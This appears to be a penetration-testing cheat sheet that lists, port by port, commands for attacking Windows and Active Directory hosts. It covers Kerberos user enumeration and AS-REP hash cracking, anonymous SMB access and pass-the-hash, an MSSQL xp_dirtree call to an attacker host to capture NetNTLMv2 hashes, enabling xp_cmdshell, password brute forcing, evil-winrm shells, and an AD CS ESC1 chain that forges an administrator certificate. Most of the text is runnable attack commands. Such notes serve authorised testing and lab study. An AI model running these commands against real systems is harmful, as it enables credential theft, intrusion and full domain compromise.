📋Master Port Enumeration Cheat Sheet¶

Port 53 ([[DNS]])¶

🔹 Zone Transfer Attempt¶

dig axfr @<TARGET-IP> <domain>

axfr requests zone transfer; @ sets the DNS server.

Look for: - Full DNS zone dump (hostnames, internal IPs, server names) - Naming conventions that leak environment details - Potential sensitive hosts (like "backup", "admin", "dev")

🔹 Basic DNS Queries¶

dig @<TARGET-IP> any <domain>

any asks for all record types; @ sets DNS server. Look for: - A records, MX records, SRV records - VPN or remote-access services - External-facing web apps or portals

💡 Zone transfer = jackpot. Partial info from ANY query still helps.

Port 88 (Kerberos)¶

🔹 Kerberos Pre-Auth Scan¶

nmap --script krb5-enum-users -p88 <TARGET-IP> --script-args krb5-enum-users.realm='<REALM>'

-p88 target Kerberos; script enums users against realm. Look for: - Usernames (especially service accounts) - Accounts WITHOUT "requires pre-auth" (AS-REP roasting potential)

🔹 AS-REP Roasting¶

After usernames found: - Try requesting TGTs without pre-auth:

GetNPUsers.py <REALM>/ -no-pass -usersfile users.txt -dc-ip <TARGET-IP> -format hashcat -outputfile asrep_hashes.txt

-no-pass anon; -usersfile list; -dc-ip DC; -format hashcat for cracking; -outputfile save. Look for: $krb5asrep$23$... hashes; crack with hashcat -m 18200 asrep_hashes.txt rockyou.txt.

💡 Some AD misconfigs allow user enumeration even anonymously.

Port 135 (MSRPC)¶

🔹 RPC Enumeration¶

rpcdump.py <TARGET-IP>

No flags: dumps exposed RPC endpoints/pipes. Look for: - efsrpc pipe = possible PetitPotam attack - spoolss pipe = possible PrinterBug attack - samr = enumerate users, groups, domain info - Other exposed RPC pipes

💡 RPC is often ignored and it's a goldmine if misconfigured.

Ports 139 / 445 (NetBIOS / SMB)¶

smbclient -L //<TARGET-IP> -N

-L list shares; -N no auth. Look for: - Shares allowing guest/everyone access - Shares like BACKUP, ADMIN$, `C$ - Sensitive filenames (passwords, backups)

🔹 Enum4Linux-ng¶

enum4linux-ng <TARGET-IP>

All-in-one SMB/NetBIOS/LDAP info grabber. Defaults enumerate domain info, users, shares. Look for: - Domain/NetBIOS names
- User and share lists
- Password policies
- Computer accounts

🔹 Nmap SMB vuln check¶

nmap -p139,445 --script smb-enum-shares,smb-enum-users,smb-os-discovery,smb-vuln* <TARGET-IP>

-p ports; scripts for shares/users/OS/vulns. Look for: - Old vulnerabilities (MS08-067, EternalBlue, SMBGhost)
- SMB signing status (off = NTLM relay possible)

💡 If SMB signing is disabled, NTLM relay is a real play.

🔹 Rapid checks (NetExec)¶

nxc smb <TARGET-IP> -u '' -p '' --shares
nxc smb <TARGET-IP> -u <user> -p <pass> --shares
nxc smb <TARGET-IP> -u <user> -H <NTLMHASH> --shares   # PTH

--shares enumerate; -H hash PTH.

🔹 Browse/download¶

smbclient -N //<TARGET-IP>/<share> -c 'ls'
smbclient -N //<TARGET-IP>/<share>          # interactive, use mget/get

-c 'ls' one-shot listing; otherwise interactive.

Ports 389 / 636 / 3268 / 3269 (LDAP / LDAPS / Global Catalog)¶

🔹 LDAP Search¶

ldapsearch -x -H ldap://<TARGET-IP> -b "dc=example,dc=com"

-x simple bind; -H URI; -b base DN. Look for: - Users and their attributes (servicePrincipalName, pwdLastSet, description)
- Groups like Domain Admins
- Computer objects - GPP password remnants

💡 If LDAP anonymous bind works, you’re inside the house.

🔹 Quick LDAP auth check (NetExec)¶

nxc ldap <TARGET-IP> -u '' -p '' --kerberos

--kerberos request Kerberos auth; empty creds test anon. Look for: anon/guest allowed, realm info leak.

Port 464 (Kerberos Password Service)¶

🔹 Skip unless: - You found usernames and want to try password change abuse. > 💡 Not usually directly exploitable without credentials.

Port 593 (RPC over HTTP)¶

🔹 Enumerate¶

nmap -p593 --script=rpcinfo <TARGET-IP>

rpcinfo lists available RPC services over HTTP. -p593 targets RPC over HTTP; script enumerates registered endpoints. Look for: - Active HTTP RPC bindings
- Services like DCOM or Print Spooler

💡 Rarely directly vulnerable, but may expose RPC pipes.

Port 1433 (Microsoft SQL Server)¶

🔹 Service Info Check¶

nmap -sV -p1433 --script ms-sql-info <TARGET-IP>

-sV version; script extracts SQL details.

mssqlclient.py <domain>/<user>:<pass>@<TARGET-IP>
# If SQL auth only, drop domain: mssqlclient.py <user>:<pass>@<TARGET-IP>

<domain>/<user> for AD; omit for SQL auth.

🔹 Coerce NetNTLMv2 (Responder)¶

EXEC xp_dirtree '\\\\<ATTACKER_IP>\\share';
# Run while: responder -I <tun0>

Triggers outbound SMB to capture NetNTLMv2.

🔹 Mine SQL error logs for creds¶

EXEC xp_readerrorlog 0, 1, N'Login failed';
EXEC xp_readerrorlog 0, 1, N'password';

xp_readerrorlog searches SQL logs for strings. Look for: mistyped usernames/passwords recorded in error logs.

🔹 Enable/Use xp_cmdshell (if perms)¶

EXEC sp_configure 'show advanced options',1; RECONFIGURE;
EXEC sp_configure 'xp_cmdshell',1; RECONFIGURE;
xp_cmdshell 'whoami';

Enable and run OS commands if allowed.

🔹 Quick bruteforce¶

hydra -L /usr/share/seclists/Usernames/sql-server-usernames.txt \
      -P /usr/share/seclists/Passwords/Common-Credentials/best110.txt \
      -t 4 -f mssql://<TARGET-IP>

-L/-P user/pass lists; -t threads; -f stop on first hit.

Port 3389 (RDP)¶

🔹 RDP Security Settings¶

nmap -p3389 --script rdp-enum-encryption <TARGET-IP>

-p3389 target RDP; script checks encryption/NLA. Look for: - Encryption level
- NLA enabled or not
- Weak ciphers

🔹 Screenshot (optional)¶

nmap -p3389 --script rdp-screenshot <TARGET-IP>

Captures a single RDP screenshot if permitted.

Port 5985 (WinRM)¶

🔹 Credential / hash check¶

nxc winrm <TARGET-IP> -u <user> -p <pass>
nxc winrm <TARGET-IP> -u <user> -H <NTLMHASH>   # PTH

winrm module tests creds; -H hash PTH.

🔹 Shell¶

evil-winrm -i <TARGET-IP> -u <user> -p '<pass>'
evil-winrm -i <TARGET-IP> -u <user> -H <NTLMHASH>
KRB5CCNAME=<ticket.ccache> evil-winrm -i <TARGET-IP> -r <realm> -u <user> -k

-H NTLM hash; -k use Kerberos ticket in KRB5CCNAME.

💡 Use Kerberos tickets (ccache) post-certipy for DA shells.

AD CS (Certificate Services) – ESC1 (cross-service, LDAP/RPC)¶

🔹 Enumerate¶

certipy find -dc-ip <IP> -u <user> -p <pass> -enabled -vulnerable

find lists templates/CAs; -vulnerable highlights ESC paths. Look for: EnrolleeSuppliesSubject + ClientAuth + Domain Users enroll.

🔹 Request cert as admin¶

certipy req -dc-ip <IP> -u <user> -p '<pass>' -ca <CA> -template <Template> \
  -upn administrator@<domain> -dns <dc> -outfile administrator

-template vulnerable template; -upn spoofed identity; -outfile base name for PFX.

🔹 Get TGT/hash from PFX¶

certipy auth -pfx administrator.pfx -dc-ip <IP>
# yields administrator.ccache and NT hash

auth converts PFX to Kerberos TGT and NT hash.

🔹 Use ticket¶

KRB5CCNAME=administrator.ccache impacket-wmiexec -k -no-pass administrator@<dc>
KRB5CCNAME=administrator.ccache evil-winrm -i <IP> -r <realm> -u administrator -k

KRB5CCNAME points tools to use the Kerberos ticket. Look for: - Login screen info - Visible domain

💡 No NLA or weak encryption? Brute forcing may work.

Port 5120 (Barracuda BBS)¶

nc -nv <TARGET-IP> 5120

-n numeric only; -v verbose to read banner. Look for: - Product/version info - Default credential hints
- Vulnerable software versions

💡 Often misconfigured or unpatched.

Ports 5985 / 47001 (WinRM / HTTPAPI)¶

🔹 Confirm Service¶

curl -i http://<TARGET-IP>:5985/wsman
curl -i http://<TARGET-IP>:47001/wsman

-i show headers; basic reachability check for WinRM endpoints. Look for: - Auth methods (Basic, NTLM, Kerberos)
- Domain or hostnames

🔹 Header probing¶

nmap -p5985,47001 --script http-headers,http-title <TARGET-IP>

-p WinRM/HTTPAPI ports; scripts pull headers/page titles. Look for: - Server type and software
- Verbose or leaking headers

💡 WinRM open + creds = Remote PowerShell access.

Port 7680 (Pando / Windows Update Delivery Optimization)¶

nc -nv <TARGET-IP> 7680

-n numeric; -v verbose to grab banner. Look for: - Windows Delivery Optimization
- Unexpected headers

💡 Low value unless relayable or leaking.

Port 9389 (Active Directory Web Services)¶

🔹 Enumerate if possible¶

nmap -p9389 --script adsi-search --script-args 'adsi-search.base=""' <TARGET-IP>

-p9389 ADWS; script queries ADSI; empty base = rootDSE. Look for: - Confirm ADWS is running
- Try authenticated queries later if usernames found

💡 Usually needs creds to enumerate much.

Octopus Tentacle (Port 10934)¶

nc -nv <TARGET-IP> 10934 -n numeric; -v verbose to read banner.

Service Version Detection¶

nmap -sV -p10934 <TARGET-IP> -sV version detection; -p target Tentacle port.

SSL Certificate Check¶

openssl s_client -connect <TARGET-IP>:10934 s_client prints TLS handshake and certificate.

📋Master Port Enumeration Cheat Sheet¶

Port 53 ([[DNS]])¶

🔹 Zone Transfer Attempt¶

🔹 Basic DNS Queries¶

Port 88 (Kerberos)¶

🔹 Kerberos Pre-Auth Scan¶

🔹 AS-REP Roasting¶

Port 135 (MSRPC)¶

🔹 RPC Enumeration¶

Ports 139 / 445 (NetBIOS / SMB)¶

🔹 Anonymous share listing¶

🔹 Enum4Linux-ng¶

🔹 Nmap SMB vuln check¶

🔹 Rapid checks (NetExec)¶

🔹 Browse/download¶

Ports 389 / 636 / 3268 / 3269 (LDAP / LDAPS / Global Catalog)¶

🔹 LDAP Search¶

🔹 Quick LDAP auth check (NetExec)¶

Port 464 (Kerberos Password Service)¶

Port 593 (RPC over HTTP)¶

🔹 Enumerate¶

Port 1433 (Microsoft SQL Server)¶

🔹 Service Info Check¶

🔹 Login (SQL auth / domain)¶

🔹 Coerce NetNTLMv2 (Responder)¶

🔹 Mine SQL error logs for creds¶

🔹 Enable/Use xp_cmdshell (if perms)¶

🔹 Quick bruteforce¶

Port 3389 (RDP)¶

🔹 RDP Security Settings¶

🔹 Screenshot (optional)¶

Port 5985 (WinRM)¶

🔹 Credential / hash check¶

🔹 Shell¶

AD CS (Certificate Services) – ESC1 (cross-service, LDAP/RPC)¶

🔹 Enumerate¶

🔹 Request cert as admin¶

🔹 Get TGT/hash from PFX¶

🔹 Use ticket¶

Port 5120 (Barracuda BBS)¶

🔹 Banner grabbing¶

Ports 5985 / 47001 (WinRM / HTTPAPI)¶

🔹 Confirm Service¶

🔹 Header probing¶

Port 7680 (Pando / Windows Update Delivery Optimization)¶

🔹 Banner Grabbing¶

Port 9389 (Active Directory Web Services)¶

🔹 Enumerate if possible¶

Octopus Tentacle (Port 10934)¶

Banner Grab¶

Service Version Detection¶

SSL Certificate Check¶